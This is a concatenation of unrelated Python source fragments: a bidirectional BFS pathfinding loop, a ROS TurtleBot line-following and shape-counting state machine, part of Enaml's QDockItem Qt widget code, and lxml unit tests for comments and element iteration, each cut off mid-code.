destCurrent = destQueue.pop(0)
sourceCurrent = queue.pop(0)
for edge in sourceCurrent.connections:
tempScore = sourceShortest[sourceCurrent] + 1
if tempScore < sourceShortest[edge]:
sourceParent[edge] = sourceCurrent
sourceShortest[edge] = tempScore
if edge not in queue and edge != source:
queue.append(edge)
if not edge.isVisited():
edge.setInQueue()
for edge in destCurrent.connections:
tempScore = destShortest[destCurrent] + 1
if tempScore < destShortest[edge]:
destParent[edge] = destCurrent
destShortest[edge] = tempScore
if edge not in queue and edge != source:
destQueue.append(edge)
if not edge.isVisited():
edge.setInQueue()
drawing()
if sourceCurrent != source:
sourceCurrent.setAsVisited()
if destCurrent != destination:
destCurrent.setAsVisited()
if (sourceCurrent.isVisited() or sourceCurrent.isInQueue()) and sourceCurrent in destParent:
totalTime = time.time() - startTime
distanceCovered = reconstructdirectionalPath(sourceParent, | |
<filename>src/follower.py
#!/usr/bin/env python
import rospy
from sensor_msgs.msg import Image
from sensor_msgs.msg import Joy
from kobuki_msgs.msg import Led, Sound
from geometry_msgs.msg import Twist
import cv2, cv_bridge, numpy
import smach
import smach_ros
global stop, donot_check_time, image_pub, err, cmd_vel_pub, bridge, stop_count, line_lost, led_pub1, led_pub2, sound_pub
'''
shape_id
0 triangle
1 square
2 circle
'''
global shape_id_counts, object_counts, chosen_shape, shape_found
shape_found = False
chosen_shape = "circle"
shape_id_counts = {
"task2": numpy.asarray([0, 0, 0]),
"task3": numpy.asarray([0 ,0 ,0])
} # green, red (task 2 and 3)
object_counts = {
"task1": numpy.asarray([0, 0, 0]), # task 1 [1obj, 2obj, 3obj]
"task2": numpy.asarray([0, 0, 0]) # task 2 [1obj, 2obj, 3obj]
} # task 1 and 2
line_lost = False
stop_count = 0
rospy.init_node('follower')
err = 0
led_pub1 = rospy.Publisher('/mobile_base/commands/led1', Led, queue_size=1)
led_pub2 = rospy.Publisher('/mobile_base/commands/led2', Led, queue_size=1)
sound_pub = rospy.Publisher('/mobile_base/commands/sound', Sound, queue_size=1)
global start, callback_state
start = True
callback_state = 0
'''
0 follow line
1 task 1
2 task 2
3 task 3
'''
def joy_callback(msg):
global start
if msg.buttons[0] == 1:
rospy.loginfo("start pressed!")
start = not start
def follow_line(image):
global stop, donot_check_time, image_pub, err, line_lost
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
lower_white = numpy.array([0, 0, 242])
upper_white = numpy.array([170, 50, 256])
lower_red = numpy.array([130, 132, 110])
upper_red = numpy.array([200, 256, 256])
mask = cv2.inRange(hsv, lower_white, upper_white)
mask_red = cv2.inRange(hsv, lower_red, upper_red)
masked = cv2.bitwise_and(image, image, mask=mask_red)
# image_pub.publish(bridge.cv2_to_imgmsg(masked, encoding='bgr8'))
# check red line
h, w, d = image.shape
search_top = h-70
search_bot = h-50
mask_red[0:search_top, 0:w] = 0
mask_red[search_bot:h, 0:w] = 0
M = cv2.moments(mask_red)
if M['m00'] > 0 and rospy.Time.now() > donot_check_time:
stop = True
donot_check_time = rospy.Time.now()+rospy.Duration(5)
if stop:
if M['m00'] > 0:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
cv2.circle(image, (cx, cy), 20, (0,255,0), -1)
image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
return
# masked = cv2.bitwise_and(image, image, mask=mask)
# image_pub.publish(bridge.cv2_to_imgmsg(masked, encoding='bgr8'))
# track white line
h, w, d = image.shape
search_top = h-70
search_bot = h-50
mask[0:search_top, 0:w] = 0
mask[search_bot:h, 0:w] = 0
M = cv2.moments(mask)
if M['m00'] > 0:
line_lost = False
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
cv2.circle(image, (cx, cy), 20, (0,0,255), -1)
err = cx - w/2
else:
line_lost = True
image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
def display_led(count):
global led_pub1, led_pub2
if count == 0:
led_pub1.publish(Led(Led.BLACK))
led_pub2.publish(Led(Led.BLACK))
elif count == 1:
led_pub1.publish(Led(Led.BLACK))
led_pub2.publish(Led(Led.ORANGE))
elif count == 2:
led_pub1.publish(Led(Led.ORANGE))
led_pub2.publish(Led(Led.BLACK))
elif count == 3:
led_pub1.publish(Led(Led.ORANGE))
led_pub2.publish(Led(Led.ORANGE))
def detect_1(image):
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
lower_red = numpy.array([130, 132, 110])
upper_red = numpy.array([200, 256, 256])
mask_red = cv2.inRange(hsv, lower_red, upper_red)
ret, thresh = cv2.threshold(mask_red, 127, 255, 0)
kernel = numpy.ones((9,9),numpy.float32)/25
thresh = cv2.filter2D(thresh,-1,kernel)
im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = list(filter(lambda c: c.size > 100, contours))
cv2.drawContours(image, contours, -1, (0, 0, 255), 3)
masked = cv2.bitwise_and(image, image, mask=mask_red)
count = clamp_count(len(contours))
return masked, count
def detect_2(image):
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
lower_red = numpy.array([130, 132, 110])
upper_red = numpy.array([200, 256, 256])
lower_green = numpy.array([44, 54, 63])
upper_green = numpy.array([88, 255, 255])
mask_red = cv2.inRange(hsv, lower_red, upper_red)
mask_green = cv2.inRange(hsv, lower_green, upper_green)
ret, thresh_red = cv2.threshold(mask_red, 127, 255, 0)
# thresh_red = mask_red
thresh_green = mask_green # did not bother doing threshold on green
kernel = numpy.ones((3,3),numpy.float32)/25
thresh_red = cv2.filter2D(thresh_red,-1,kernel)
_, contours_green, hierarchy = cv2.findContours(thresh_green, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
_, contours_red, hierarchy = cv2.findContours(thresh_red, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours_green = list(filter(lambda c: c.size > 70, contours_green))
contours_red = list(filter(lambda c: c.size > 40, contours_red))
vertices = get_vertices(contours_green)
cv2.drawContours(image, contours_green, -1, (0,255,0), 3)
cv2.drawContours(image, contours_red, -1, (0,0,255), 3)
mask = cv2.bitwise_or(mask_red, mask_green)
masked = cv2.bitwise_and(image, image, mask=mask)
count = clamp_count(len(contours_red) + 1)
return masked, count, get_shape_id(vertices)
def detect_3(image):
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
# lower_red = numpy.array([130, 132, 110])
# upper_red = numpy.array([200, 256, 256])
lower_red = numpy.array([0, 205, 38])
upper_red = numpy.array([180, 255, 125])
mask_red = cv2.inRange(hsv, lower_red, upper_red)
h, w, d = image.shape
mask_red[:,0:w/5] = 0
mask_red[:,4*w/5:w] = 0
# ret, thresh_red = cv2.threshold(mask_red, 127, 255, 0)
thresh_red = mask_red
kernel = numpy.ones((3,3),numpy.float32)/25
thresh_red = cv2.filter2D(thresh_red,-1,kernel)
_, contours_red, hierarchy = cv2.findContours(thresh_red, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours_red = list(filter(lambda c: c.size > 40, contours_red))
vertices = get_vertices(contours_red)
cv2.drawContours(image, contours_red, -1, (0,0,255), 3)
mask = mask_red
masked = cv2.bitwise_and(image, image, mask=mask)
count = clamp_count(len(contours_red))
return masked, count, get_shape_id(vertices)
def clamp_count(count):
if count < 1:
return 1
elif count > 3:
return 3
else:
return count
def get_shape_id(vertices):
if vertices == 3:
id = 0
elif vertices == 4:
id = 1
else:
id = 2
return id
def get_shape(shape_id):
if shape_id == 0:
shape = "triangle"
elif shape_id == 1:
shape = "square"
else:
shape = "circle"
return shape
def get_vertices(contours):
approx = []
areas = [cv2.contourArea(c) for c in contours]
if len(areas):
max_index = numpy.argmax(areas)
largest_contour = contours[max_index]
peri = cv2.arcLength(largest_contour, True)
approx = cv2.approxPolyDP(largest_contour, 0.04 * peri, True)
return len(approx)
def image_callback(msg):
global callback_state
global shape_id_counts, object_counts
image = bridge.imgmsg_to_cv2(msg,desired_encoding='bgr8')
if callback_state == 0:
follow_line(image)
elif callback_state == 1:
image, count = detect_1(image)
object_counts["task1"][count-1] += 1 # count -1 as index starts at 0
image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
# display_led(count)
elif callback_state == 2: # reset object_counts in the state
image, count, shape_id = detect_2(image)
object_counts["task2"][count-1] += 1
shape_id_counts["task2"][shape_id] += 1
image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
# display_led(count)
elif callback_state == 3:
image, count, shape_id = detect_3(image)
shape_id_counts["task3"][shape_id] += 1
image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
rospy.Subscriber("/joy", Joy, joy_callback)
bridge = cv_bridge.CvBridge()
image_pub = rospy.Publisher('transformed_img', Image, queue_size=1)
cmd_vel_pub = rospy.Publisher('cmd_vel_mux/input/teleop', Twist, queue_size=1)
image_sub = rospy.Subscriber('/camera/rgb/image_raw', Image, image_callback)
# cmd_vel_pub = rospy.Publisher('/teleop_velocity_smoother/raw_cmd_vel', Twist, queue_size=1)
donot_check_time = rospy.Time.now()
stop = False
class Go(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['stop'])
self.twist = Twist()
print "start"
def execute(self, data):
global stop, err, cmd_vel_pub, stop_count, start
while not rospy.is_shutdown():
if stop:
stop = False
return 'stop'
else:
self.twist.linear.x = 0.2
self.twist.angular.z = -float(err) / 200
cmd_vel_pub.publish(self.twist)
class Stop(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['go', 'task1', 'task2', 'task3', 'finish'])
self.twist = Twist()
def execute(self, data):
global stop, cmd_vel_pub, stop_count
stop_count += 1
# go a bit further
wait_time = rospy.Time.now() + rospy.Duration(1)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0.2
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
# speed = 0.2
# while speed > 0:
# self.twist.linear.x = 0.2
# self.twist.angular.z = 0
# cmd_vel_pub.publish(self.twist)
# speed -= 0.00001
# determin which it is
if stop_count == 1:
return 'task1'
elif stop_count == 3:
return 'task2'
elif stop_count == 5:
wait_time = rospy.Time.now() + rospy.Duration(1)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
return 'task3'
elif stop_count <0:
return 'finish'
# regular stop
wait_time = rospy.Time.now() + rospy.Duration(2)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
return 'go'
# class Task1(smach.State):
# def __init__(self):
# smach.State.__init__(self, outcomes=['go'])
# self.twist = Twist()
# def execute(self, data):
# global stop, cmd_vel_pub, callback_state, object_counts
# wait_time = rospy.Time.now() + rospy.Duration(3)
# while rospy.Time.now()<wait_time:
# self.twist.linear.x = 0.2
# self.twist.angular.z = 0
# cmd_vel_pub.publish(self.twist)
# wait_time = rospy.Time.now() + rospy.Duration(1.6)
# while rospy.Time.now()<wait_time:
# self.twist.linear.x = 0
# self.twist.angular.z = 1.5
# cmd_vel_pub.publish(self.twist)
# wait_time = rospy.Time.now() + rospy.Duration(20)
# callback_state = 1
# while rospy.Time.now()<wait_time:
# self.twist.linear.x = 0
# self.twist.angular.z = 0
# cmd_vel_pub.publish(self.twist)
# callback_state = 0
# wait_time = rospy.Time.now() + rospy.Duration(1.6)
# object_count = numpy.argmax(object_counts["task1"]) + 1
# print "task1" + str(object_count)
# exit()
# while rospy.Time.now()<wait_time:
# display_led(object_count)
# self.twist.linear.x = 0
# self.twist.angular.z = -1.5
# cmd_vel_pub.publish(self.twist)
# # exit()
# return 'go'
class Task1(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['go'])
self.twist = Twist()
def execute(self, data):
global stop, cmd_vel_pub, callback_state, sound_pub
wait_time = rospy.Time.now() + rospy.Duration(1.5)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0.2
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
wait_time = rospy.Time.now() + rospy.Duration(1.2)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0
self.twist.angular.z = 1.5
cmd_vel_pub.publish(self.twist)
wait_time = rospy.Time.now() + rospy.Duration(1)
callback_state = 1
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
callback_state = 0
object_count = numpy.argmax(object_counts["task1"]) + 1
for i in range(object_count):
# wait_time_sound = rospy.Time.now() + rospy.Duration(0.5)
# while rospy.Time.now()<wait_time_sound:
sound_pub.publish(Sound(0))
wait_time_sound = rospy.Time.now() + rospy.Duration(1)
while rospy.Time.now()<wait_time_sound:
continue
wait_time = rospy.Time.now() + rospy.Duration(1.2)
while rospy.Time.now()<wait_time:
display_led(object_count)
self.twist.linear.x = 0
self.twist.angular.z = -1.5
cmd_vel_pub.publish(self.twist)
return 'go'
class Task2(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['go'])
self.twist = Twist()
def execute(self, data):
global stop, cmd_vel_pub, err, line_lost, callback_state, object_counts, shape_id_counts, sound_pub, chosen_shape
print 'in task 2'
wait_time = rospy.Time.now() + rospy.Duration(1.5)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0.2
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
wait_time = rospy.Time.now() + rospy.Duration(1.4)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0
self.twist.angular.z = 1.5
cmd_vel_pub.publish(self.twist)
# track the line
print 'tracking line'
while (not rospy.is_shutdown()) and (not line_lost):
self.twist.linear.x = 0.2
self.twist.angular.z = -float(err) / 200
cmd_vel_pub.publish(self.twist)
# reaches the end, stop for 2 second
print | |
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from enaml.qt.QtCore import Qt, QRect, QSize, QPoint, QTimer, Signal
from enaml.qt.QtGui import QApplication, QFrame, QLayout
from .event_types import (
QDockItemEvent, DockItemShown, DockItemHidden, DockItemClosed
)
from .q_dock_tab_widget import QDockTabWidget
from .q_dock_title_bar import QDockTitleBar
from .utils import repolish
class _AlertData(object):
""" A private class which stores the data needed for item alerts.
"""
def __init__(self, timer, level, on, off, repeat, persist):
self.timer = timer
self.level = level
self.on = on
self.off = off
self.repeat = repeat
self.persist = persist
self.remaining = repeat
self.active = False
class QDockItemLayout(QLayout):
""" A QLayout subclass for laying out a dock item.
"""
def __init__(self, parent=None):
""" Initialize a QDockAreaLayout.
Parameters
----------
parent : QWidget or None
The parent widget owner of the layout.
"""
super(QDockItemLayout, self).__init__(parent)
self._size_hint = QSize()
self._min_size = QSize()
self._max_size = QSize()
self._title_bar = None
self._dock_widget = None
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def titleBarWidget(self):
""" Get the title bar widget set for the layout.
Returns
-------
result : IDockItemTitleBar or None
The title bar widget for the layout, or None if no widget
is applied.
"""
return self._title_bar
def setTitleBarWidget(self, title_bar):
""" Set the title bar widget for the layout.
The old widget will be hidden and unparented, but not destroyed.
Parameters
----------
title_bar : IDockItemTitleBar or None
A concrete implementor of the title bar interface, or None.
"""
old_bar = self._title_bar
if old_bar is not None:
old_bar.hide()
old_bar.setParent(None)
self._title_bar = title_bar
if title_bar is not None:
title_bar.setParent(self.parentWidget())
self.invalidate()
def dockWidget(self):
""" Get the dock widget set for the layout.
Returns
-------
result : QWidget
The primary widget set in the dock item layout.
"""
return self._dock_widget
def setDockWidget(self, widget):
""" Set the dock widget for the layout.
The old widget will be hidden and unparented, but not destroyed.
Parameters
----------
widget : QWidget
The widget to use as the primary content in the layout.
"""
old_widget = self._dock_widget
if widget is old_widget:
return
if old_widget is not None:
old_widget.hide()
old_widget.setParent(None)
self._dock_widget = widget
if widget is not None:
widget.setParent(self.parentWidget())
self.invalidate()
#--------------------------------------------------------------------------
# QLayout API
#--------------------------------------------------------------------------
def invalidate(self):
""" Invalidate the layout.
"""
super(QDockItemLayout, self).invalidate()
self._size_hint = QSize()
self._min_size = QSize()
self._max_size = QSize()
def setGeometry(self, rect):
""" Set the geometry for the items in the layout.
"""
super(QDockItemLayout, self).setGeometry(rect)
title = self._title_bar
widget = self._dock_widget
title_rect = QRect(rect)
widget_rect = QRect(rect)
if title is not None and not title.isHidden():
msh = title.minimumSizeHint()
title_rect.setHeight(msh.height())
widget_rect.setTop(title_rect.bottom() + 1)
title.setGeometry(title_rect)
if widget is not None and not widget.isHidden():
widget.setGeometry(widget_rect)
def sizeHint(self):
""" Get the size hint for the layout.
"""
sh = self._size_hint
if not sh.isValid():
width = height = 0
title = self._title_bar
widget = self._dock_widget
if title is not None and not title.isHidden():
hint = title.sizeHint()
width += hint.width()
height += hint.height()
if widget is not None and not widget.isHidden():
hint = widget.sizeHint()
width = max(width, hint.width())
height += hint.height()
sh = self._size_hint = QSize(width, height)
return sh
def minimumSize(self):
""" Get the minimum size for the layout.
"""
ms = self._min_size
if not ms.isValid():
width = height = 0
title = self._title_bar
widget = self._dock_widget
if title is not None and not title.isHidden():
hint = title.minimumSizeHint()
width += hint.width()
height += hint.height()
if widget is not None and not widget.isHidden():
hint = widget.minimumSizeHint()
width = max(width, hint.width())
height += hint.height()
ms = self._min_size = QSize(width, height)
return ms
def maximumSize(self):
""" Get the maximum size for the layout.
"""
ms = self._max_size
if not ms.isValid():
widget = self._dock_widget
parent = self.parentWidget()
if widget is not None and parent.isFloating():
ms = widget.maximumSize()
title = self._title_bar
if title is not None and not title.isHidden():
height = ms.height() + title.minimumSizeHint().height()
ms.setHeight(min(16777215, height))
else:
ms = QSize(16777215, 16777215)
self._max_size = ms
return ms
#--------------------------------------------------------------------------
# QLayout Abstract API
#--------------------------------------------------------------------------
def addItem(self, item):
""" A required virtual method implementation.
"""
msg = 'Use `setTitleBarWidget | setDockWidget` instead.'
raise NotImplementedError(msg)
def count(self):
""" A required virtual method implementation.
This method should not be used and returns a constant value.
"""
return 0
def itemAt(self, idx):
""" A virtual method implementation which returns None.
"""
return None
def takeAt(self, idx):
""" A virtual method implementation which does nothing.
"""
return None
class QDockItem(QFrame):
""" A QFrame subclass which acts as an item QDockArea.
"""
#: A signal emitted when the maximize button is clicked. This
#: signal is proxied from the current dock item title bar.
maximizeButtonClicked = Signal(bool)
#: A signal emitted when the restore button is clicked. This
#: signal is proxied from the current dock item title bar.
restoreButtonClicked = Signal(bool)
#: A signal emitted when the close button is clicked. This
#: signal is proxied from the current dock item title bar.
closeButtonClicked = Signal(bool)
#: A signal emitted when the link button is toggled. This
#: signal is proxied from the current dock item title bar.
linkButtonToggled = Signal(bool)
#: A signal emitted when the pin button is toggled. This
#: signal is proxied from the current dock item title bar.
pinButtonToggled = Signal(bool)
#: A signal emitted when the title is edited by the user. This
#: signal is proxied from the current dock item title bar.
titleEdited = Signal(unicode)
#: A signal emitted when the empty area is left double clicked.
#: This signal is proxied from the current dock item title bar.
titleBarLeftDoubleClicked = Signal(QPoint)
#: A signal emitted when the empty area is right clicked. This
#: signal is proxied from the current dock item title bar.
titleBarRightClicked = Signal(QPoint)
#: A signal emitted when the item is alerted. The payload is the
#: new alert level. An empty string indicates no alert.
alerted = Signal(unicode)
def __init__(self, parent=None):
""" Initialize a QDockItem.
Parameters
----------
parent : QWidget, optional
The parent of the dock item.
"""
super(QDockItem, self).__init__(parent)
layout = QDockItemLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.setSizeConstraint(QLayout.SetMinAndMaxSize)
self.setLayout(layout)
self.setTitleBarWidget(QDockTitleBar())
self.alerted.connect(self._onAlerted)
self._manager = None # Set and cleared by the DockManager
self._alert_data = None
self._vis_changed = None
self._closable = True
self._closing = False
#--------------------------------------------------------------------------
# Reimplementations
#--------------------------------------------------------------------------
def close(self):
""" Handle the close request for the dock item.
"""
self._closing = True
try:
super(QDockItem, self).close()
finally:
self._closing = False
def closeEvent(self, event):
""" Handle the close event for the dock item.
This handler will reject the event if the item is not closable.
"""
event.ignore()
if self._closable:
event.accept()
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
event = QDockItemEvent(DockItemClosed, self.objectName())
QApplication.postEvent(area, event)
def showEvent(self, event):
""" Handle the show event for the container.
This handler posts a visibility change event.
"""
super(QDockItem, self).showEvent(event)
self._postVisibilityChange(True)
def hideEvent(self, event):
""" Handle the hide event for the container.
This handler posts a visibility change event.
"""
super(QDockItem, self).hideEvent(event)
# Don't post when closing; A closed event is posted instead.
if not self._closing:
self._postVisibilityChange(False)
def mousePressEvent(self, event):
""" Handle the mouse press event for the dock item.
This handler will clear any alert level on a left click.
"""
if event.button() == Qt.LeftButton:
self.clearAlert()
super(QDockItem, self).mousePressEvent(event)
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def manager(self):
""" Get the dock manager for this dock item.
Returns
-------
result : DockManager or None
The dock manager which is managing this item.
"""
return self._manager
def rootDockArea(self):
""" Get the root dock area for this dock item.
Returns
-------
result : QDockArea or None
The root dock area for this dock item.
"""
manager = self._manager
if manager is not None:
return manager.dock_area()
def title(self):
""" Get the title for the dock item.
Returns
-------
result : unicode
The unicode title for the dock item.
"""
return self.titleBarWidget().title()
def setTitle(self, title):
""" Set the title for the dock item.
Parameters
----------
title : unicode
The unicode title to use for | |
self.etree.PI
root = Element('root')
pi = PI('TARGET', 'TEXT')
pi.tail = "TAIL"
self.assertEqual(_bytes('<root></root>'),
self._writeElement(root))
root.addnext(pi)
self.assertEqual(_bytes('<root></root>\n<?TARGET TEXT?>'),
self._writeElement(root))
def test_addnext_comment(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
Comment = self.etree.Comment
root = Element('root')
SubElement(root, 'a')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root><a></a></root>'),
self._writeElement(root))
root[0].addnext(comment)
self.assertEqual(_bytes('<root><a></a><!--TEXT -->TAIL</root>'),
self._writeElement(root))
def test_addnext_root_comment(self):
Element = self.etree.Element
Comment = self.etree.Comment
root = Element('root')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root></root>'),
self._writeElement(root))
root.addnext(comment)
self.assertEqual(_bytes('<root></root>\n<!--TEXT -->'),
self._writeElement(root))
def test_addprevious_comment(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
Comment = self.etree.Comment
root = Element('root')
SubElement(root, 'a')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root><a></a></root>'),
self._writeElement(root))
root[0].addprevious(comment)
self.assertEqual(_bytes('<root><!--TEXT -->TAIL<a></a></root>'),
self._writeElement(root))
def test_addprevious_root_comment(self):
Element = self.etree.Element
Comment = self.etree.Comment
root = Element('root')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root></root>'),
self._writeElement(root))
root.addprevious(comment)
self.assertEqual(_bytes('<!--TEXT -->\n<root></root>'),
self._writeElement(root))
# ET's Elements have items() and key(), but not values()
def test_attribute_values(self):
XML = self.etree.XML
root = XML(_bytes('<doc alpha="Alpha" beta="Beta" gamma="Gamma"/>'))
values = root.values()
values.sort()
self.assertEqual(['Alpha', 'Beta', 'Gamma'], values)
# gives error in ElementTree
def test_comment_empty(self):
Element = self.etree.Element
Comment = self.etree.Comment
a = Element('a')
a.append(Comment())
self.assertEqual(
_bytes('<a><!----></a>'),
self._writeElement(a))
# ElementTree ignores comments
def test_comment_parse_empty(self):
ElementTree = self.etree.ElementTree
tostring = self.etree.tostring
xml = _bytes('<a><b/><!----><c/></a>')
f = BytesIO(xml)
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
'',
a[1].text)
self.assertEqual(
xml,
tostring(a))
# ElementTree ignores comments
def test_comment_no_proxy_yet(self):
ElementTree = self.etree.ElementTree
f = BytesIO('<a><b></b><!-- hoi --><c></c></a>')
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
' hoi ',
a[1].text)
# does not raise an exception in ElementTree
def test_comment_immutable(self):
Element = self.etree.Element
Comment = self.etree.Comment
c = Comment()
el = Element('myel')
self.assertRaises(TypeError, c.append, el)
self.assertRaises(TypeError, c.insert, 0, el)
self.assertRaises(TypeError, c.set, "myattr", "test")
def test_comment_immutable_attrib(self):
c = self.etree.Comment()
self.assertEqual(0, len(c.attrib))
self.assertFalse(c.attrib.__contains__('nope'))
self.assertFalse('nope' in c.attrib)
self.assertFalse('nope' in c.attrib.keys())
self.assertFalse('nope' in c.attrib.values())
self.assertFalse(('nope', 'huhu') in c.attrib.items())
self.assertEqual([], list(c.attrib))
self.assertEqual([], list(c.attrib.keys()))
self.assertEqual([], list(c.attrib.items()))
self.assertEqual([], list(c.attrib.values()))
self.assertEqual([], list(c.attrib.iterkeys()))
self.assertEqual([], list(c.attrib.iteritems()))
self.assertEqual([], list(c.attrib.itervalues()))
self.assertEqual('HUHU', c.attrib.pop('nope', 'HUHU'))
self.assertRaises(KeyError, c.attrib.pop, 'nope')
self.assertRaises(KeyError, c.attrib.__getitem__, 'only')
self.assertRaises(KeyError, c.attrib.__getitem__, 'names')
self.assertRaises(KeyError, c.attrib.__getitem__, 'nope')
self.assertRaises(KeyError, c.attrib.__setitem__, 'nope', 'yep')
self.assertRaises(KeyError, c.attrib.__delitem__, 'nope')
# test passing 'None' to dump()
def test_dump_none(self):
self.assertRaises(TypeError, self.etree.dump, None)
def test_prefix(self):
ElementTree = self.etree.ElementTree
f = BytesIO('<a xmlns:foo="http://www.infrae.com/ns/1"><foo:b/></a>')
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
None,
a.prefix)
self.assertEqual(
'foo',
a[0].prefix)
def test_prefix_default_ns(self):
ElementTree = self.etree.ElementTree
f = BytesIO('<a xmlns="http://www.infrae.com/ns/1"><b/></a>')
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
None,
a.prefix)
self.assertEqual(
None,
a[0].prefix)
def test_getparent(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
None,
a.getparent())
self.assertEqual(
a,
b.getparent())
self.assertEqual(
b.getparent(),
c.getparent())
self.assertEqual(
b,
d.getparent())
def test_iterchildren(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<three/></doc>'))
result = []
for el in root.iterchildren():
result.append(el.tag)
self.assertEqual(['one', 'two', 'three'], result)
def test_iterchildren_reversed(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<three/></doc>'))
result = []
for el in root.iterchildren(reversed=True):
result.append(el.tag)
self.assertEqual(['three', 'two', 'one'], result)
def test_iterchildren_tag(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two></doc>'))
result = []
for el in root.iterchildren(tag='two'):
result.append(el.text)
self.assertEqual(['Two', 'Bla'], result)
def test_iterchildren_tag_posarg(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two></doc>'))
result = []
for el in root.iterchildren('two'):
result.append(el.text)
self.assertEqual(['Two', 'Bla'], result)
def test_iterchildren_tag_reversed(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two></doc>'))
result = []
for el in root.iterchildren(reversed=True, tag='two'):
result.append(el.text)
self.assertEqual(['Bla', 'Two'], result)
def test_iterchildren_tag_multiple(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two><three/></doc>'))
result = []
for el in root.iterchildren(tag=['two', 'three']):
result.append(el.text)
self.assertEqual(['Two', 'Bla', None], result)
def test_iterchildren_tag_multiple_posarg(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two><three/></doc>'))
result = []
for el in root.iterchildren('two', 'three'):
result.append(el.text)
self.assertEqual(['Two', 'Bla', None], result)
def test_iterchildren_tag_multiple_reversed(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two><three/></doc>'))
result = []
for el in root.iterchildren(reversed=True, tag=['two', 'three']):
result.append(el.text)
self.assertEqual([None, 'Bla', 'Two'], result)
def test_iterancestors(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[],
list(a.iterancestors()))
self.assertEqual(
[a],
list(b.iterancestors()))
self.assertEqual(
[a],
list(c.iterancestors()))
self.assertEqual(
[b, a],
list(d.iterancestors()))
def test_iterancestors_tag(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[a],
list(d.iterancestors('a')))
self.assertEqual(
[a],
list(d.iterancestors(tag='a')))
self.assertEqual(
[b, a],
list(d.iterancestors('*')))
self.assertEqual(
[b, a],
list(d.iterancestors(tag='*')))
def test_iterancestors_tag_multiple(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[b, a],
list(d.iterancestors(tag=('a', 'b'))))
self.assertEqual(
[b, a],
list(d.iterancestors('a', 'b')))
self.assertEqual(
[],
list(d.iterancestors(tag=('w', 'x', 'y', 'z'))))
self.assertEqual(
[],
list(d.iterancestors('w', 'x', 'y', 'z')))
self.assertEqual(
[],
list(d.iterancestors(tag=('d', 'x'))))
self.assertEqual(
[],
